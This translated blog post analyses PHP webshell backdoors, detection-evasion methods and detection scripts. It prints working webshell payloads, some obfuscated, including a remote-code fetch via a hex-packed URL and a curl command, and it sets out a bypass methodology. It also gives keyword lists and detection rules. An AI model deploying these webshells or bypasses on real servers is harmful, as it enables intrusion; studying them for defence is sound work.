PHP WebShell backdoor scripts and detection tools
2022-08-02 03:00:00 【wespten】
A Webshell is the backdoor most commonly used after a website has been compromised. Through a Webshell an attacker can execute system commands on the web server, steal data, plant viruses, extort core data, plant SEO hijack links and carry out other malicious operations, so the harm is very great.
A so-called Webshell is a script or text file that web servers such as apache, tomcat and nginx can interpret and execute on the spot; in essence it is a plain text file. Because it is covert, script-based, flexible, convenient and powerful, it is widely popular among hackers, so Webshell detection is a focus of cloud security defense and has even become a standard part of it.
Attack-defense confrontation has escalated in recent years, and the challenge for the defender keeps growing. The battlefield is no longer decided by who has seen more samples, but increasingly by confrontation at the level of methodology: attackers tend to look for a methodological system and challenge the defense at the system level. In the course of this fight the Anqishi (安骑士) Webshell detection system has gradually developed a comprehensive set of measures: static rules + dynamic rules + lexical/AST parsing + dynamic simulated execution + machine learning. The aim is to raise the threshold and the cost of a bypass and so mitigate the Webshell problem.
PHP is a dynamic, weakly typed language; parameter passing, type conversion and function calling are all very flexible. This is convenient for developers, but it also makes it easy for attackers to write all kinds of malformed malicious code. Leafing through the PHP manual, we can find many exotic ways of achieving the same thing, for example:
二、The kinds of attacks PHP may face
As the saying goes, "to do a good job, first sharpen your tools". For an engineer, systematic knowledge is the best "tool". While first accumulating knowledge points this is not a big problem, but the further you go the stronger the need for systematic understanding becomes; it lets you boil your notes down to their essentials.
XSS: for PHP web applications, cross-site scripting is a vulnerable point. An attacker can use it to steal user information. You can configure Apache, or write safer PHP code (validate all user input), to defend against XSS attacks.
SQL injection: this is the database layer of a PHP application being attacked. Prevention is as above. A common method is to escape parameters with mysql_real_escape_string() before running the SQL query.
File upload: this lets visitors place (upload) files on the server. It can lead to a series of problems such as deletion of server files and databases, or retrieval of user information. You can disable file uploads in PHP, or write more secure code (such as checking user input and only allowing image formats like png and gif to be uploaded).
Local and remote file inclusion: an attacker can make the server open a file on a remote server, run any PHP code, then upload or delete files and install a backdoor. This can be prevented by settings that disable remote files.
eval/assert: these functions execute a string as PHP code. They are often used by attackers to hide code and tools on the server. This can be addressed by configuring PHP to disable calls to functions such as eval.
CSRF (cross-site request forgery): this attack makes the end user perform a specified action under their current account, endangering the user's data and the safety of their operations. If the targeted end user's account has administrator rights, the entire web application is threatened.
1. How the attacker passes external command parameters
a. External parameters obtained from the built-in global arrays
$cmd = ($_REQUEST["cmd"]);
echo "</pre>$cmd<pre>";
This is easily detected by security software. To increase stealth, Trojans are deformed in many ways and disguised through all kinds of functions.
b. Environment-variable related functions are used to collect the external parameters
c. The external parameters are written to disk as file/directory information
d. The external parameters are stored in the output buffering cache
e. PHP native functions are used to obtain the external parameters
f. Input/output streams are used to obtain the external parameters
g. A network request to a remote IP is used to obtain the external parameters
h. XML processing functions are used to obtain the external parameters
i. Database-related extensions are used to obtain the external parameters
j. Local register variables are used to receive the external parameters
2. Dynamically generated numbers and strings
a. Dynamically generated array keys
① Use try-catch to store and generate the current array key
② Use another array variable to store the current array key
③ Use time-delay logic to generate the current array key
④ Use random logic to generate the current array key
b. Dynamically generated parameter names
Using operators: increment, XOR, logical NOT, bitwise NOT
c. Dynamically generated function names
① Using string concatenation
② Using the explode string-splitting technique
3. Encoding/decoding string content
a. Using BASE64 encoding/decoding
b. Using string reversal
c. Using text replacement
d. Using hexadecimal (0x) string encoding
4. Ways of passing arguments to functions/variables
a. Using array callback functions to pass parameters
b. Using define to pass parameters via macro definitions
c. Using custom encryption/decryption functions and passing the parameters after re-processing
d. Using class method overloading for implicit parameter passing
e. Using try-catch to transfer the function
try { throw new Exception("system"); }
5. Ways of executing instructions
a. Using PHP native functions to execute instructions
<?php assert($_POST[sb]);?>
$item['wind'] = 'assert';
$array[] = $item;
$_POST['code'] && $_SESSION['theCode'] = trim($_POST['code']);
<?php $a =str_replace(x,"","axsxxsxexrxxt");$a($_POST["code"]); ?> //Note: the request parameter is ?code=fputs(fopen(base64_decode(J2MucGhwJw==),w),base64_decode("PD9waHAgQGV2YWwoJF9QT1NUW2FdKTs/Pg=="))
The command finally executed: <?php assert(fputs(fopen('c.php',w),"<?php @eval($_POST[a]);?>"))?>
<?php ($code = $_POST['code']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($code)', 'add'); ?> //Note: first the eval function is hidden as str_rot13('riny'); then, via the e modifier, once preg_replace has finished the string substitution the engine evaluates the resulting string as PHP code with eval and uses the return value as the final replacement string.
<?php if(empty($_SESSION['api']))
$_SESSION['api']=substr(file_get_contents(sprintf('%s? %s',pack("H*",'687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067'),uniqid())),3649);
b. Executing instructions via include
include ROOT_PATH . $_REQUEST['target'];
<?php $filename=$_GET['code'];include ($filename); ?> //Because include compiles a file of any extension as PHP and runs it, one can upload a .txt file containing PHP and write the real backdoor into that text file.
c. Code execution via array callback functions
($a = 'assert')&&($b = $_POST['a'])&&call_user_func_array($a, array($b));
array_udiff_assoc(array($_REQUEST[$password]), array(1), "assert");
d. The dynamic string function call feature (in PHP a string can be called directly as a function name)
$dyn_func = $_GET['dyn_func']; $argument = $_GET['argument']; $dyn_func($argument);
e. Using serialization/deserialization features to execute instructions
f. Using class constructor/destructor features to execute instructions
g. Using anonymous (lambda-style) functions to execute instructions
eval("function lambda_n() { eval($_GET[1]); }"); lambda_n();
$a = function($b) { system($b); }; $a($_GET['c']);
h. Executing instructions by registering a callback
i. Using reflection to execute instructions
j. Using the PHP ${} feature to execute instructions
k. Using the system output buffer to execute instructions
l. Using the backtick (`) operator to execute system instructions
m. Using string-processing callbacks to execute instructions
n. Using static class methods to execute instructions
class foo { static function a(callable $b) { $b($_GET['c']); } } foo::a('system');
6. Dynamically changing the program's execution flow
a. Using the ternary operator
b. Deciding the result of some IF condition according to an externally passed parameter
c. Using header to implement a secondary jump
d. Writing externally passed instructions to persistent storage, then executing them via include
7. Special techniques for attacking the sandbox/lexical engine
Inserting code comments
This sample has the following bypass points:
- Using try-catch to transfer the function
- External parameters obtained from the built-in global arrays
- The dynamic string function call feature (in PHP a string can be called directly as a function name)
Establishing this kind of thinking framework has several advantages:
- The PHP language features themselves fall into different dimensions; by browsing the kernel source code within each dimension, they can be enumerated exhaustively
- The different PHP tricks are roughly orthogonal dimensions of one another; by studying cross-combinations of the dimensions, many bypass samples can be produced efficiently
- For an attacker facing a defender, a single-point breakthrough is enough: once a particular bypass point is found, deriving variants along the other dimensions around it can produce a large number of bypasses in a short time, which makes for rapid breakthroughs in actual combat
2、Simulated-execution coverage attacks
For PHP Webshells the current mainstream approaches in the industry are [static/dynamic AST lexical analysis] or [dynamic sandbox testing]. Against this kind of defense the offense/defense game is fought over the [completeness of the simulation engine], for example:
- PHP versions and support for old syntax
- Interrupting taint tracking
- Data sharing between parent and child classes
- Passing by reference
- Calling undefined functions
- Exploiting error/fault-tolerance mechanisms
- Control-flow dependent escapes
- Passing via macro definitions
- and so on...
We pick a few categories to focus on.
Control-flow dependent escapes
As can be seen, the information (the external parameter) is not passed directly through assignment or a function call, but implicitly through control flow. If the AST engine or sandbox cannot handle this grammar correctly, the taint information is lost in transit, and in the end the sink cannot be detected effectively.
The attack uses the ReflectionFunction mapping class with a reference parameter to modify the value of $args; if the engine does not handle references well, taint propagation is interrupted.
Passing via macro definitions
Using macro variables, the external parameters can be passed along.
3、Context-dependence difference attacks
A so-called context-dependence difference attack means that running the attack sample depends on a specific context. From the point of view of information theory this can be understood as additional information, and the offense/defense game is fought over that information. A common saying in security is "capture logs, detect and defend as close as possible to the scene of the attack"; many offline detection schemes are too far from the original scene of the attack, the contextual information is badly lost, and detection and prevention become much harder.
Running multiple times to expose the real attack intention
In real hacker usage a sample must be run several times before the real attack is triggered, whereas a sandbox or AST engine often runs it only for a limited time. This is the so-called "the hacker knows how to run it, the user knows too, only the defender does not know", and it is a commonly used bypass in actual combat.
Storing the external parameters temporarily in a third party such as environment variables
First the variable is passed through putenv, then the content of the path variable is read back, so c=path=phpinfo(); is enough to complete the exploitation.
This kind of sample succeeds easily in real attacks, because on any Linux operating system the web server process can generally access and operate on environment variables. But for a detection engine, if storage of and access to environment variables are not handled correctly, the tainted parameter fails to be propagated.
4、Attack-traffic difference attacks
A so-called attack-traffic difference attack is one of the most common ways of bypassing a detection, and also a way of thinking: to break through a defense, the essence of a bypass is to find the point where the defense system differs. For PHP Webshells, the passing of external parameters and the traffic are a critical point of difference.
To illustrate the sandbox better, the author introduces two concepts here: [static re-entrant samples] and [dynamic non-repeatable multimodal samples].
The so-called [static re-entrant samples] are most traditional PHP Webshell samples, which we call "re-entrant single-mode samples". Such samples can use many of PHP's tricky features and all kinds of encoding and encryption, and their code can be very complex, for example:
But fundamentally these samples are "re-entrant and single-mode": no matter how many times they are run, or who runs them (the victim or the offline engine being bypassed), the result is the same.
From the point of view of taint-tracking theory, this phase of the sandbox solves the [explicit taint propagation problem]: the flow of taint information in the sample code is explicit, and simulated execution can reproduce it 100%.
On the other hand, for [dynamic non-repeatable multimodal samples] the key is not which tricky PHP syntax features they use but their "non-re-entrancy and multiple modes". We explain with specific examples.
The dynamically dependent branch problem (the execution flow and action are decided dynamically by the input parameters)
For such a sample, the path of the external parameters is like a map that marks a "road chain"; only by strictly following that "road chain" to the end can the sample's real attack intention be seen. For the many offline detection engines in the industry this is a big challenge: with an exponential number of branches, once one branch goes the wrong way the attacker's bypass succeeds.
Generating function names dynamically from the external parameters
This mainly attacks offline detection techniques represented by sandboxes and dynamic AST engines: offline detection has lost the contextual information of the attack scene, so it is hard for it to simulate the real attack behaviour.
Unusual ways of obtaining external parameters
With the [taint-tracking detection technology] commonly used in the industry, basically all vendors know to mark PHP's common HTTP superglobal parameters as tainted, such as GET/POST/COOKIE.
But in fact "external parameter" is a generic concept; in theory, "all externally controllable input is bad, and all of it needs to be tracked". An externally controllable input source is a channel-like concept: in principle any channel that is both "externally controllable" and "content controllable" counts as externally controllable input. They include, but are not limited to:
<title>404 Not Found</title>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
header('HTTP/1.1 404 Not Found');
Disguised through all kinds of functions; here one has to complain that PHP's weak typing is deadly for security.
- HTTP header input
- Network channel input: as long as the return zval of the source API is marked tainted, the taint mark is then carried along the API sequence
file_get_contents() socket_create_listen() socket_listen() curl_init()
- Network-related system commands executed through a wrapper, taking instructions from information on the external network
system(): system("curl xxxxx/evil.command") popen() exec() passthru() shell_exec()
- Externally controllable parameters obtained through database operations
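The source list just given (superglobals, headers, file and network reads, environment variables) is exactly what a taint tracker has to treat as untrusted. The following Python script is an added example, not code from the original post: a deliberately small intra-file taint heuristic that follows request-controlled values through assignments to the sinks of section 5 (the dynamic $var() call of 5.d and the include of 5.b) and through the putenv()/getenv() detour described in section 3. Splitting statements on semicolons, the SOURCES/SINKS/SANITIZERS lists and the four SAMPLES are all my own constructions.

```python
"""Intra-file taint heuristic for PHP: follow attacker-controlled values from the
sources listed above to the sinks of section 5, including the putenv()/getenv()
detour of section 3. Added example, not code from the original post; splitting
statements on ';' is a deliberate simplification and the SAMPLES are constructed."""
import re

# What the attacker controls: the HTTP superglobals plus the "unusual" channels above.
SOURCES = re.compile(
    r"\$_(?:GET|POST|REQUEST|COOKIE|SERVER|FILES)\b"
    r"|\b(?:apache_request_headers|getallheaders|file_get_contents|stream_get_contents|curl_exec)\s*\("
    r"|php://input")
SINKS = ("eval", "assert", "system", "exec", "passthru", "shell_exec", "popen", "proc_open",
         "create_function", "call_user_func_array", "call_user_func", "preg_replace",
         "include_once", "include", "require_once", "require")
SINK_RE = re.compile(r"(?<![\w$])(" + "|".join(SINKS) + r")\b\s*\(?\s*(.*)$", re.S)
ASSIGN_RE = re.compile(r"^\$(\w+)\s*(\.?=)(?!=)\s*(.*)$", re.S)
DYNCALL_RE = re.compile(r"\$(\w+)\s*\(")          # $name(...): a variable used as function name
SANITIZERS = ("intval(", "(int)", "floatval(")    # conversions that leave nothing executable


def statements(src):
    """Strip PHP tags and line comments, then split on ';' (good enough for samples)."""
    src = re.sub(r"<\?php|\?>|//[^\n]*", " ", src)
    return [s.strip() for s in src.split(";") if s.strip()]


class Tracker:
    def __init__(self):
        self.tainted = {}        # variable name -> provenance chain
        self.env_chain = None    # set once putenv() has stored attacker data

    def taint_of(self, expr):
        """Provenance chain if expr carries attacker data, else None."""
        if any(s in expr for s in SANITIZERS):
            return None
        m = SOURCES.search(expr)
        if m:
            return m.group(0).rstrip("( ")
        for var in re.findall(r"\$(\w+)", expr):
            if var in self.tainted:
                return "$" + var + " <- " + self.tainted[var]
        if self.env_chain and "getenv(" in expr:   # the environment became a source via putenv()
            return "getenv <- " + self.env_chain
        return None

    def analyse(self, src):
        findings = []
        for stmt in statements(src):
            m = re.match(r"putenv\s*\((.*)", stmt, re.S)
            if m and self.taint_of(m.group(1)):
                self.env_chain = "putenv <- " + self.taint_of(m.group(1))
                continue
            m = SINK_RE.search(stmt)
            if m and self.taint_of(m.group(2)):
                findings.append(m.group(1) + " <- " + self.taint_of(m.group(2)))
            for var in DYNCALL_RE.findall(stmt):
                if var in self.tainted:
                    findings.append("dynamic call $" + var + " <- " + self.tainted[var])
            m = ASSIGN_RE.match(stmt)
            if m:
                chain = self.taint_of(m.group(3))
                if chain:
                    self.tainted[m.group(1)] = chain
                elif m.group(2) == "=":
                    self.tainted.pop(m.group(1), None)   # a clean reassignment clears taint
        return findings


def scan_php(src):
    return Tracker().analyse(src)


# Constructed samples: the first two mirror 5.d and 5.b above, the third the putenv()
# detour of section 3, the fourth shows a value that is cast and therefore harmless.
SAMPLES = {
    "dynamic_call": "$dyn_func = $_GET['dyn_func']; $argument = $_GET['argument']; $dyn_func($argument);",
    "include": "include ROOT_PATH . $_REQUEST['target'];",
    "putenv": "<?php putenv($_GET['c']); $p = getenv('path'); assert($p); ?>",
    "sanitized": "$page = intval($_GET['p']); include \"pages/\" . $page . \".php\";",
}

if __name__ == "__main__":
    for label, code in SAMPLES.items():
        print(label, "->", scan_php(code) or "no finding")
```

The provenance chain in each finding is what an analyst actually needs at the sink: not just "assert() was called" but "assert() received $p, which came from getenv(), which putenv() filled from $_GET". A real engine would do this on an AST with loops and functions; the point of the toy is that the environment, files and headers have to be sources too, or the chain breaks exactly where the post says it does.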
Conditional dependence on external parameters
5、Attacks against static detection rules
Attacks against static detection rules are what we usually call bypassing some vendor's regular-expression blacklist rules. There are already very many articles discussing this kind of attack, so the author will not repeat them here.
What the author hopes to present here is a methodology for attacking static detection rules, namely [sample deformation based on reducible redundancy].
Observe the following 3 expressions and regard them as a logical abstraction of a webshell sample:
((X+6)+Y)+X + (if( (X*Y)>0 ){X}else{X} + X*X) + (X + (Y - (X + if(6>0){1}else{0})) )
# X*Y is always greater than 0, so it can be reduced to:
2*X + Y + 6 + X + X**2 + (X + (Y - (X + if(6>0){1}else{0})) )
# 6 is always greater than 0, so it can be reduced to:
2*X + Y + 6 + X + X**2 + X + Y - X + 1
The final reduction gives:
X**2 + 3*X + 2*Y + 5
In terms of the final result, i.e. the function computed, the 3 expressions above are the same.
If the last expression is regarded as the most compact version of a webshell, for example:
<?php eval($_POST[1]);?>
By the law of reducible redundancy, code that realizes the same function can be extended infinitely; it is an enumeration.
link(__FILE__, 'ZXZhbCgkX1JFUVVFU1RbJ2NtZCddKTsK');
link(__FILE__, 'YXNzZXJ0Cg==');
$d = substr(readlink('ZXZhbCgkX1JFUVVFU1RbJ2NtZCddKTsK'), -32);
$e = substr(readlink('YXNzZXJ0Cg=='), -12);
$e = base64_decode($e);
$b = $e[0].'ssert';
These 2 files differ greatly in code architecture.
This reducible redundancy leads directly to very different disassembly results and API call sequences between samples.
@$_++; // $_ = 1
$__=("#"^"|"); // $__ = _
$__.=("."^"~"); // _P
$__.=("/"^"`"); // _PO
$__.=("|"^"/"); // _POS
$__.=("{"^"/"); // _POST
${$__}[!$_](${$__}[$_]); // $_POST[0]($_POST[1]);
$ftdf = str_replace("w","","stwrw_wrwepwlwawcwe");
$smgv = $ftdf("f", "", "bfafsfef6f4_fdfefcodfe");
$jgfi = $ftdf("l","","lclrlelaltel_functlilon");
$rdwm = $jgfi('', $smgv($ftdf("gi", "", $zrmt.$kthe.$wmmi.$penh))); $rdwm();
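Every one of the disguises above (str_replace stripping a filler character, str_rot13 in 5.a, base64_decode, the $_POST name built from XORed literals, and function names parked in variables) is a constant expression, so a detector can fold them back before applying keyword rules. The Python below is an added example and not code from the original post; SAMPLES are constructed copies of the three snippets above with comments removed, and the DANGEROUS list is taken from the keyword lists in section 四.

```python
"""Constant-fold the string tricks used above (str_replace with an empty replacement,
str_rot13, base64_decode, strrev, XOR of string literals, '.' concatenation, and
function names held in variables) until the real sink name is visible.
Added example, not code from the original post; SAMPLES are constructed copies
of the idioms shown above with comments and request parameters stripped."""
import base64
import codecs
import re

# Names worth reporting once they surface (from the grep keyword lists further down).
DANGEROUS = ("eval", "assert", "system", "exec", "passthru", "shell_exec", "popen",
             "proc_open", "create_function", "call_user_func", "call_user_func_array",
             "base64_decode", "preg_replace")
QLIT = r"""(?:'[^'\\]*'|"[^"\\]*")"""                 # quoted literal (no escapes)
LIT = r"(?:" + QLIT + r"|\b[A-Za-z0-9_+/=]+)"          # ...or a bare word: PHP treats an
                                                       # undefined constant as its own name
XOR = re.compile(r"\(\s*(" + LIT + r")\s*\^\s*(" + LIT + r")\s*\)")
CONCAT = re.compile(r"(" + QLIT + r")\s*\.\s*(" + QLIT + r")")
CALL = re.compile(r"\b(str_replace|str_rot13|strrev|base64_decode)\s*\(\s*("
                  + LIT + r"(?:\s*,\s*" + LIT + r")*)\s*\)", re.I)
ASSIGN = re.compile(r"\$(\w+)\s*(\.?=)(?!=)\s*(" + LIT + r")\s*;")
SINK = re.compile(r"\b(" + "|".join(DANGEROUS) + r")\s*\(", re.I)
REQUEST_CALL = re.compile(r"\$_(?:POST|GET|REQUEST|COOKIE)\s*\[[^\]]*\]\s*\(")


def unquote(tok):
    return tok[1:-1] if tok[0] in "'\"" else tok


def quote(s):
    """Re-emit a folded value as a PHP literal; None if it cannot be written safely."""
    if not s.isprintable():
        return None
    if "'" not in s:
        return "'" + s + "'"
    return '"' + s + '"' if '"' not in s and "$" not in s else None


def _fold_xor(m):
    a, b = unquote(m.group(1)), unquote(m.group(2))
    # PHP XORs byte-wise over the length of the shorter operand, which zip() reproduces
    return quote("".join(chr(ord(x) ^ ord(y)) for x, y in zip(a, b))) or m.group(0)


def _fold_call(m):
    name = m.group(1).lower()
    args = [unquote(t) for t in re.findall(LIT, m.group(2))]
    try:
        if name == "str_replace" and len(args) == 3:
            val = args[2].replace(args[0], args[1]) if args[0] else args[2]
        el_if = None  # placeholder to keep the chain readable
        if name == "str_rot13" and len(args) == 1:
            val = codecs.encode(args[0], "rot13")
        elif name == "strrev" and len(args) == 1:
            val = args[0][::-1]
        elif name == "base64_decode" and len(args) == 1:
            val = base64.b64decode(args[0], validate=True).decode("ascii")
        elif name != "str_replace":
            return m.group(0)
    except (ValueError, UnicodeDecodeError):
        return m.group(0)
    return quote(val) or m.group(0)


def _fold_concat(m):
    return quote(unquote(m.group(1)) + unquote(m.group(2))) or m.group(0)


def deobfuscate(src, max_rounds=10):
    """Fold until a fixpoint; returns (folded source, {variable: literal value})."""
    env = {}
    for _ in range(max_rounds):
        before = src
        src = CONCAT.sub(_fold_concat, CALL.sub(_fold_call, XOR.sub(_fold_xor, src)))
        env = {}
        for m in ASSIGN.finditer(src):            # $v = 'lit';  and  $v .= 'lit';
            name, op, val = m.group(1), m.group(2), unquote(m.group(3))
            if op == "=":
                env[name] = val
            elif name in env:
                env[name] += val
        for name, val in env.items():             # $v(...) -> lit(...),  ${$v} -> $lit
            if re.fullmatch(r"[A-Za-z_]\w*", val):
                src = re.sub(r"\$" + re.escape(name) + r"\s*\(", val + "(", src)
                src = re.sub(r"\$\{\$" + re.escape(name) + r"\}", "$" + val, src)
        if src == before:
            break
    return src, env


def revealed_sinks(src):
    """Sink names that only appear after folding, plus a marker when a request
    parameter is used directly as the function name."""
    folded, _ = deobfuscate(src)
    hits = sorted({n.lower() for n in SINK.findall(folded)} - {n.lower() for n in SINK.findall(src)})
    if REQUEST_CALL.search(folded) and not REQUEST_CALL.search(src):
        hits.append("dynamic-call-from-request")
    return folded, hits


# Constructed copies of the three snippets above (comments and request parameters removed).
SAMPLES = {
    "str_replace": '<?php $a =str_replace(x,"","axsxxsxexrxxt");$a($_POST["code"]); ?>',
    "xor": '@$_++; $__=("#"^"|"); $__.=("."^"~"); $__.=("/"^"`"); $__.=("|"^"/"); $__.=("{"^"/"); '
           '${$__}[!$_](${$__}[$_]);',
    "nested": '$ftdf = str_replace("w","","stwrw_wrwepwlwawcwe"); $smgv = $ftdf("f", "", "bfafsfef6f4_fdfefcodfe"); '
              '$jgfi = $ftdf("l","","lclrlelaltel_functlilon"); '
              '$rdwm = $jgfi(\'\', $smgv($ftdf("gi", "", $zrmt.$kthe.$wmmi.$penh))); $rdwm();',
}

if __name__ == "__main__":
    for label, code in SAMPLES.items():
        folded, hits = revealed_sinks(code)
        print(label, "->", hits, "\n   ", folded)
```

Folding is what turns the "infinite set" of section 5 back into the compact form: the third sample never mentions base64_decode or create_function in its source text, yet both appear after two rounds, and the XOR sample ends as $_POST[!$_]($_POST[$_]), which a plain keyword rule would never have matched.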
四、PHP WebShell detection tools
There are also many ways of searching by eye:
By file name/modification time/size, compare against a file backup to find anomalies (SVN/Git diff to see whether a file has been modified)
Find them with a WEBSHELL backdoor scanning script, such as Scanbackdoor.php / Pecker / shelldetect.php / (zhujiweishi)
Below is 360 zhujiweishi, which is very simple to use on a Linux server.
Through common keywords such as the following (use find and grep together to search for code files containing them):
System command execution: system, passthru, shell_exec, exec, popen, proc_open
Code execution: eval, assert, call_user_func, base64_decode, gzinflate, gzuncompress, gzdecode, str_rot13
File inclusion: require, require_once, include, include_once, file_get_contents, file_put_contents, fputs, fwrite
#!/usr/bin/env python
# encoding: utf-8
# Ported to Python 3 and made runnable: the fragment as posted was missing the end
# of the rule list, the file read inside md5sum() and the body of the main block.
import os, sys
import re
import hashlib
import time

rulelist = [
    r'(new com\s*\(\s*[\'|\"]shell(.*)[\'|\"]\s*\))',
    # the rest of the original rule list is not reproduced on this page; the two
    # rules below are derived from the keyword lists above
    r'\b(eval|assert)\s*\(\s*(\$_(GET|POST|REQUEST|COOKIE)|base64_decode|str_rot13|gzinflate)',
    r'\b(system|passthru|shell_exec|exec|popen|proc_open)\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)',
]

def scan(path):
    print(' 可疑文件 ')
    for root, dirs, files in os.walk(path):
        for filespath in files:
            fullpath = os.path.join(root, filespath)
            if os.path.getsize(fullpath) < 1024000:
                # read as text; bytes that are not valid UTF-8 (binary files) are skipped
                with open(fullpath, errors='ignore') as f:
                    filestr = f.read()
                for rule in rulelist:
                    result = re.compile(rule).findall(filestr)
                    if result:
                        print('文件:' + fullpath)
                        print('恶意代码:' + str(result[0][0:200]))
                        print('最后修改时间:' + time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(os.path.getmtime(fullpath))))
                        print('\n\n')

def md5sum(md5_file):
    m = hashlib.md5()
    with open(md5_file, 'rb') as fp:   # the posted version never read the file, so it hashed nothing
        for chunk in iter(lambda: fp.read(8192), b''):
            m.update(chunk)
    return m.hexdigest()

def check_sshd():
    # the md5 of /etc/issue identifies the distribution; the paired sshd md5 is the one
    # the post flags as a modified binary for that distribution (values as given in the post)
    if md5sum('/etc/issue') == '3e3c7c4194b12af573ab11c16990c477':
        if md5sum('/usr/sbin/sshd') == 'abf7a90c36705ef679298a44af80b10b':
            print("\033[31m sshd被修改,Suspected left the back door\033[m")
    if md5sum('/etc/issue') == '6c9222ee501323045d85545853ebea55':
        if md5sum('/usr/sbin/sshd') == '4bbf2b12d6b7f234fa01b23dc9822838':
            print("\033[31m sshd被修改,Suspected left the back door\033[m")

if __name__ == '__main__':
    if len(sys.argv) != 2:
        print('参数错误')
        print("\tAccording to the malicious code to find:" + sys.argv[0] + '目录名')
        sys.exit(1)
    if os.path.lexists(sys.argv[1]) == False:
        print("目录不存在")
        sys.exit(1)
    print('\n\n开始查找:' + sys.argv[1])
    if len(sys.argv) == 2:
        scan(sys.argv[1])
        if os.path.exists('/etc/issue') and os.path.exists('/usr/sbin/sshd'):
            check_sshd()
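The first search method listed above, comparing the web root against a known-good copy, is easy to automate even without SVN/Git: keep a hash baseline of the tree and diff the current state against it. The script below is an added example, not code from the original post; demo() builds a temporary directory of constructed files, plants the two kinds of change an intrusion typically leaves (a legitimate page altered, a new executable file in an upload directory), and removes one file, so the whole thing runs offline.

```python
"""Baseline-and-diff check for a web root: hash every file once, then report what
was added, modified or removed since, and single out the entries the web server
would execute. Added example, not code from the original post; demo() builds a
throwaway tree of constructed files under a temporary directory."""
import hashlib
import os
import tempfile

# Extensions the web server hands to the PHP interpreter (adjust to the server config).
WEB_EXTENSIONS = (".php", ".phtml", ".php5", ".phar", ".inc")


def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(root):
    """Map each file (path relative to root) to (sha256, size, mtime)."""
    snap = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            st = os.stat(full)
            snap[os.path.relpath(full, root)] = (sha256_of(full), st.st_size, int(st.st_mtime))
    return snap


def compare(baseline, current):
    """Diff two snapshots. 'modified' is decided by hash only: size and mtime are kept
    for the report, but an intruder can reset both with touch."""
    return {
        "added": sorted(p for p in current if p not in baseline),
        "modified": sorted(p for p in current if p in baseline and current[p][0] != baseline[p][0]),
        "removed": sorted(p for p in baseline if p not in current),
    }


def executable_web_files(paths):
    """Paths the web server would execute as PHP; these deserve the first look."""
    return [p for p in paths if p.lower().endswith(WEB_EXTENSIONS)]


def demo():
    """Build a throwaway web root, baseline it, simulate an intrusion, and diff."""
    with tempfile.TemporaryDirectory() as root:
        def write(rel, data, mode="w"):
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, mode) as fh:
                fh.write(data)

        write("index.php", "<?php echo 'constructed sample page'; ?>\n")
        write("uploads/logo.png", b"\x89PNG constructed placeholder", "wb")
        baseline = snapshot(root)
        # what an intrusion typically leaves behind: a legitimate page altered and a new
        # executable file in a directory that should only ever hold images
        write("index.php", "<?php /* constructed: appended line */ ?>\n", "a")
        write("uploads/avatar.php", "<?php /* constructed: placeholder for a dropped file */ ?>\n")
        os.remove(os.path.join(root, "uploads", "logo.png"))
        report = compare(baseline, snapshot(root))
        report["executable"] = sorted(executable_web_files(report["added"] + report["modified"]))
        return report


if __name__ == "__main__":
    for key, paths in demo().items():
        print(key + ":", ", ".join(paths) or "-")
```

In production the baseline is taken right after deployment and stored off the web server (an attacker with write access to the web root can rewrite a baseline kept beside it), and the run is scheduled; a new .php file under uploads/ or a changed index.php is then a page, not a grep hit.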
php.ini settings:
disable_functions =phpinfo,passthru,exec,system,chroot,scandir,chgrp,chown,shell_exec,proc_open,proc_get_status,ini_alter,ini_alter,ini_restore,dl,pfsockopen,openlog,syslog,readlink,symlink,popepassthru,stream_socket_server,get_current_user,leak,putenv,popen,opendir
Set "open_basedir" to restrict file operations to the specified directory.
Set expose_php to off, so that PHP does not leak information in the HTTP header.
Set "allow_url_fopen" to "off" to disable the remote file functions.
Set "log_errors" to "on" to enable the error log.
All user-submitted information (post, get or other form data) must be handled separately by a filter function you write yourself; make it a habit (intval, strip_tags, mysql_real_escape_string).
Always check for the Trojan eval($_POST[: search the whole site's PHP source code for this code.
Name files according to a convention, at least so that you can tell at a glance which PHP file names are suspicious.
If you use open-source code, apply patches as soon as they are released.
If the attacker has obtained the highest privileges on the server, they may hide their backdoor by changing the server configuration file php.ini; this was popular a few years ago. The principle is as follows: the two php.ini directives auto_prepend_file and auto_append_file let PHP automatically add a file before or after any PHP document before it is parsed. If an eval() backdoor function is configured there it is very cunning: the PHP files themselves contain nothing, the eval() function is only brought in before PHP parses them, and because it is global, every PHP page becomes the backdoor! So make sure that auto_prepend_file and auto_append_file have not been configured to something else, and check the source code for the first 3 items as well.
Configure with the minimum privileges possible: do not give write or execute permission to directories that do not need it.
When configuring nginx or apache, directories that must not be accessed must be configured as deny.
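The php.ini advice above can be checked mechanically. What follows is an added example, not code from the post: a small checker that parses a php.ini fragment and reports each directive that is weaker than recommended. The WEAK_INI and HARDENED_INI fragments are constructed; the hardened disable_functions list is the one given in the post (minus the duplicated ini_alter and the unrecognised popepassthru entry). allow_url_include is not in the post's list but is the directive that governs include of URLs, so it is checked too.

```python
"""Check a php.ini fragment against the hardening items listed above.
Added example, not code from the original post; WEAK_INI and HARDENED_INI are
constructed fragments (the hardened disable_functions list follows the post)."""

# Command-execution functions a webshell relies on; the post's list contains all of them.
REQUIRED_DISABLED = ("system", "passthru", "exec", "shell_exec", "proc_open", "popen",
                     "pfsockopen", "putenv", "dl")
TRUTHY = ("1", "on", "true", "yes")
# PHP's built-in value when the directive is absent from php.ini
DEFAULTS = {"expose_php": "1", "allow_url_fopen": "1"}


def parse_ini(text):
    """Return {directive: value}; comments (;), sections ([...]) and blank lines are ignored."""
    conf = {}
    for line in text.splitlines():
        line = line.split(";", 1)[0].strip()
        if not line or line.startswith("["):
            continue
        key, sep, value = line.partition("=")
        if sep:
            conf[key.strip().lower()] = value.strip().strip('"')
    return conf


def is_on(conf, key):
    return conf.get(key, DEFAULTS.get(key, "")).lower() in TRUTHY


def check_php_ini(text):
    """List every directive that is weaker than the post recommends."""
    conf = parse_ini(text)
    findings = []
    disabled = {f.strip().lower() for f in conf.get("disable_functions", "").split(",") if f.strip()}
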